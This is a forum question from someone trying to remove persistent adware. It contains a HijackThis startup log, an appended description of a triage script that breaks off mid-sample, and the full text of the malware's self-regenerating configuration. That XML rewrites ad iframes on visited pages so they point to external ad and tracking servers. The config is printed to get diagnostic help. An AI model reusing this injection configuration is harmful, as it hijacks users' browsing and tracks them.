Question

Help me remove persistent malware

Asked by: steve0412

Hi

I have a problem with a PC in that some malware seems to get half removed by McAfee, which leaves the web pages incompletely loaded. Ok, I have solved that by using Opera BUT, I cannot get rid of this pest. I use McAfee, Spy Hunter, Uniblue Spy Eraser and RogueRemover Pro; nothing will shift this.

It starts with an XML page that regenerates itself when removed (see the end of this question for the content). This appears in the HKLM Run section, to run Rundll32.exe (from the system32 directory via prefetching commands). This in turn runs a DLL, which is in the system32 directory. This malware even logs on as another user (I have since changed the logon to a guest account, with password control, to try and prevent this).

Here is the HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:26:24, on 27-01-2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programmer\Fælles filer\McAfee\HackerWatch\HWAPI.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\programmer\fælles filer\mcafee\mna\mcnasvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
c:\PROGRA~1\FÆLLES~1\mcafee\mcproxy\mcproxy.exe
c:\PROGRA~1\FÆLLES~1\mcafee\redirsvc\redirsvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
C:\Programmer\McAfee\MPF\MPFSrv.exe
C:\PROGRA~1\McAfee\MPS\mps.exe
C:\Programmer\McAfee\MSK\MskSrver.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\Programmer\SiteAdvisor\6253\SAService.exe
C:\WINDOWS\system32\svchost.exe
C:\Programmer\McAfee\MSK\MskAgent.exe
C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
C:\WINDOWS\StartupMonitor.exe
C:\Programmer\Enigma Software Group\SpyHunter\SpyHunter3.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programmer\HP\Digital Imaging\bin\hpqtra08.exe
C:\Programmer\McAfee\MPS\mpsevh.exe
C:\Programmer\HP\Digital Imaging\bin\hpqimzone.exe
c:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\WINDOWS\System32\alg.exe
C:\Programmer\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Programmer\HP\Digital Imaging\Product Assistant\bin\hprblog.exe
C:\Documents and Settings\Anne\Skrivebord\Startup.exe
C:\WINDOWS\system32\HPZinw12.exe
C:\WINDOWS\regedit.exe
C:\Documents and Settings\Anne\Skrivebord\HiJackThis.exe
C:\PROGRAM FILES\PROCESS EXPLORER\PROCEXP.EXE
C:\WINDOWS\explorer.exe
C:\Programmer\Opera\Opera.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://dellsearchedit.myway.com/samisc/dellsidebar.jhtml?p=DJ
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.epilepsiforeningen.dk/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hyperlinks
O3 - Toolbar: McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Programmer\SiteAdvisor\6253\SiteAdv.dll
O4 - HKLM\..\Run: [DLA] C:\WINDOWS\System32\DLA\DLACTRLW.EXE
O4 - HKLM\..\Run: [MskAgentexe] C:\Programmer\McAfee\MSK\MskAgent.exe
O4 - HKLM\..\Run: [SiteAdvisor] C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
O4 - HKLM\..\Run: [Run StartupMonitor] StartupMonitor.exe
O4 - HKLM\..\Run: [Spyhunter Security Suite] "C:\Programmer\Enigma Software Group\SpyHunter\SpyHunter3.exe" -minimized
O4 - HKLM\..\Run: [BM870dc8a8] Rundll32.exe "C:\WINDOWS\system32\sslnpilc.dll",s
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKAL TJENESTE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETVÆRKSTJENESTE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Programmer\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Programmer\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: HP Image Zone Hurtig start.lnk = C:\Programmer\HP\Digital Imaging\bin\hpqthb08.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Programmer\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Send til &Bluetooth-enhed... - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: FirstClass® - {02011FE3-C22B-451d-9A25-BF4DBB38B8E7} - C:\WINDOWS\Downloaded Program Files\fcplugin.dll
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmer\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmer\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O16 - DPF: {11818680-FCF6-11D0-9808-0800092A4865} (Adobe Form Control) - http://www.kps.dk/Codebase/FormCtl.cab
O16 - DPF: {1469FF24-47F6-11D2-8805-006008C537E3} (Adobe Mail Control) - http://www.kps.dk/codebase/ffmail.cab
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.mcafee.com/molbin/shared/mcinsctl/4,0,0,101/mcinsctl.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1201280089546
O16 - DPF: {9C196458-4145-46AF-8A77-1506878DFECA} (FirstClass® Control) - ftp://ftp.sektornet.dk/sektornet/skolekom/fcplugin.cab
O16 - DPF: {CDDCFBB3-4D93-11D2-B1A9-00A0C9B742BE} (Adobe Script Object) - http://www.kps.dk/codebase/scriptobject.cab
O16 - DPF: {D8575CE3-3432-4540-88A9-85A1325D3375} (e-Safekey) - https://netbank.danskebank.dk/html/activex/e-Safekey/DB/e-Safekey.cab
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Programmer\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: McAfee E-mail Proxy (Emproxy) - McAfee, Inc. - C:\PROGRA~1\FÆLLES~1\McAfee\EmProxy\emproxy.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programmer\Fælles filer\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Programmer\iPod\bin\iPodService.exe
O23 - Service: McAfee HackerWatch Service - McAfee, Inc. - C:\Programmer\Fælles filer\McAfee\HackerWatch\HWAPI.exe
O23 - Service: McAfee Update Manager (mcmispupdmgr) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcupdmgr.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - c:\programmer\fælles filer\mcafee\mna\mcnasvc.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
O23 - Service: McAfee Protection Manager (mcpromgr) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - c:\PROGRA~1\FÆLLES~1\mcafee\mcproxy\mcproxy.exe
O23 - Service: McAfee Redirector Service (McRedirector) - McAfee, Inc. - c:\PROGRA~1\FÆLLES~1\mcafee\redirsvc\redirsvc.exe
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
O23 - Service: McAfee SystemGuards (McSysmon) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Programmer\McAfee\MPF\MPFSrv.exe
O23 - Service: McAfee Privacy Service (MPS9) - McAfee, Inc. - C:\PROGRA~1\McAfee\MPS\mps.exe
O23 - Service: McAfee SpamKiller Service (MSK80Service) - McAfee Inc. - C:\Programmer\McAfee\MSK\MskSrver.exe
O23 - Service: Intel NCS NetService (NetSvc) - Intel(R) Corporation - C:\Programmer\Intel\PROSetWired\NCS\Sync\NetSvc.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SiteAdvisor-tjeneste (SiteAdvisor Service) - Unknown owner - C:\Programmer\SiteAdvisor\6253\SAService.exe

--
End of file - 8833 bytes


(See the HKLM entry for BM870dc8a8)

BM870dc8a8 is this:

<ROOT><CAMPAIGNLIST><CAMPAIGN name="120x240" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?240['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?240['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x240;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='ae4390b5' name='ae4390b5' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x240&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='240'><a href='http://85.12.43.83/www/delivery/ck.php?n=ad03d9ca' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=35&n=ad03d9ca' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="120x600" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x600;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a57232fb' name='a57232fb' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x600&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='600'><a href='http://85.12.43.83/www/delivery/ck.php?n=a2d7629e' target='_blank'><img 
src='http://85.12.43.83/www/delivery/avw.php?zoneid=36&n=a2d7629e' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="120x90" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x90;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a8c6b7cd' name='a8c6b7cd' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x90&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='90'><a href='http://85.12.43.83/www/delivery/ck.php?n=a0118327' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=37&n=a0118327' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="125x125" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?125['"]?)|(HEIGHT=['"]?125['"]?))+[^>]*?((WIDTH=['"]?125['"]?)|(HEIGHT=['"]?125['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=125x125;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a6ea2661' name='a6ea2661' 
src='http://85.17.166.173/go/?cmp=nm_bm3s_125x125&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='125' height='125'><a href='http://85.12.43.83/www/delivery/ck.php?n=afe4b666' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=38&n=afe4b666' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="160x600" id="20080124"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?160['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?((WIDTH=['"]?160['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=160x600;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a8a9405d' name='a8a9405d' src='http://85.17.166.173/go/?cmp=nm_bm3s_160x600&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='160' height='600'></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="180x150" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?180['"]?)|(HEIGHT=['"]?150['"]?))+[^>]*?((WIDTH=['"]?180['"]?)|(HEIGHT=['"]?150['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=180x150;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" 
weight="100"><![CDATA[<iframe id='aa44b86f' name='aa44b86f' src='http://85.17.166.173/go/?cmp=nm_bm3s_180x150&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='180' height='150'><a href='http://85.12.43.83/www/delivery/ck.php?n=a935a5aa' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=39&n=a935a5aa' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="234x60" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?234['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?((WIDTH=['"]?234['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=234x60;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a80f0628' name='a80f0628' src='http://85.17.166.173/go/?cmp=nm_bm3s_234x60&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='234' height='60'><a href='http://85.12.43.83/www/delivery/ck.php?n=a61ab872' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=40&n=a61ab872' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="240x400" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action 
name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?240['"]?)|(HEIGHT=['"]?400['"]?))+[^>]*?((WIDTH=['"]?240['"]?)|(HEIGHT=['"]?400['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=240x400;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a4da5d34' name='a4da5d34' src='http://85.17.166.173/go/?cmp=nm_bm3s_240x400&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='240' height='400'><a href='http://85.12.43.83/www/delivery/ck.php?n=a424da19' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=41&n=a424da19' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="250x250" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?250['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?((WIDTH=['"]?250['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=250x250;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='ad90e55d' name='ad90e55d' src='http://85.17.166.173/go/?cmp=nm_bm3s_250x250&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='250' height='250'><a href='http://85.12.43.83/www/delivery/ck.php?n=ac032ecf' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=42&n=ac032ecf' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time 
value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="300x100" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?100['"]?))+[^>]*?((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?100['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=300x100;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a1111aad' name='a1111aad' src='http://85.17.166.173/go/?cmp=nm_bm3s_300x100&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='300' height='100'><a href='http://85.12.43.83/www/delivery/ck.php?n=a8b2301d' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=43&n=a8b2301d' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="300x250" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=300x250;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a7b91358' name='a7b91358' src='http://85.17.166.173/go/?cmp=nm_bm3s_300x250&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='300' height='250'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa619a73' target='_blank'><img 
src='http://85.12.43.83/www/delivery/avw.php?zoneid=44&n=aa619a73' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="336x280" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?336['"]?)|(HEIGHT=['"]?280['"]?))+[^>]*?((WIDTH=['"]?336['"]?)|(HEIGHT=['"]?280['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=336x280;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a1e38bd4' name='a1e38bd4' src='http://85.17.166.173/go/?cmp=nm_bm3s_336x280&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='336' height='280'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa2664b8' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=45&n=aa2664b8' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="468x60" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?468['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?((WIDTH=['"]?468['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=468x60;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a24b320b' name='a24b320b' 
src='http://85.17.166.173/go/?cmp=nm_bm3s_468x60&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='468' height='60'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa173903' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=46&n=aa173903' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="720x300" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?720['"]?)|(HEIGHT=['"]?300['"]?))+[^>]*?((WIDTH=['"]?720['"]?)|(HEIGHT=['"]?300['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=720x300;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aaf81f87' name='aaf81f87' src='http://85.17.166.173/go/?cmp=nm_bm3s_720x300&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='720' height='300'><a href='http://85.12.43.83/www/delivery/ck.php?n=afb3d0f9' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=47&n=afb3d0f9' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="728x90" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action 
name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?728['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?((WIDTH=['"]?728['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=728x90;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aff78e03' name='aff78e03' src='http://85.17.166.173/go/?cmp=nm_bm3s_728x90&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='728' height='90'><a href='http://85.12.43.83/www/delivery/ck.php?n=a8ac5ed4' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=48&n=a8ac5ed4' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN></CAMPAIGNLIST><COOKIES><COOKIE>ip=ODcuNjAuOTYuOTA#</COOKIE><COOKIE>country=REs#</COOKIE><COOKIE>network=Ym0#</COOKIE></COOKIES></ROOT>

Has anyone got ANY idea how to remove the mechanism that regenerates this pest? The IP address resolves to Breda in Holland.
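The two artefacts described in the question, the Run-key value that starts a DLL through Rundll32.exe and the self-regenerating campaign XML, are what a responder wants turned into structured findings before deciding what to quarantine and what to block. The script below is an added example, not code from the post or from any of the tools it names. It parses the O4 lines of the HijackThis log above and attaches simple, non-verdict reasons to each Run entry (a DLL hosted by rundll32, a value name that looks machine-generated, a bare filename resolved through the search path), then walks the campaign XML and extracts the hosts the injected iframes point at, the ad size each campaign's regexes target, and the three cookie values, which decode as base64 once the trailing '#' is read as '=' padding (an inference from the values themselves: REs decodes to DK, Ym0 to bm). The sample inputs are copied from the post; the function names and heuristics are my own.

```python
"""Added triage helper for the artefacts in the post (not code from the post or from any tool it names)."""
import base64
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample: four O4 lines copied from the HijackThis log in the post.
SAMPLE_O4 = r"""
O4 - HKLM\..\Run: [SiteAdvisor] C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
O4 - HKLM\..\Run: [Run StartupMonitor] StartupMonitor.exe
O4 - HKLM\..\Run: [BM870dc8a8] Rundll32.exe "C:\WINDOWS\system32\sslnpilc.dll",s
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
"""

# Constructed sample: two CAMPAIGN blocks and the COOKIES block copied from the XML in the
# post (internal_state elements omitted, line breaks added between elements only).
SAMPLE_XML = """<ROOT><CAMPAIGNLIST>
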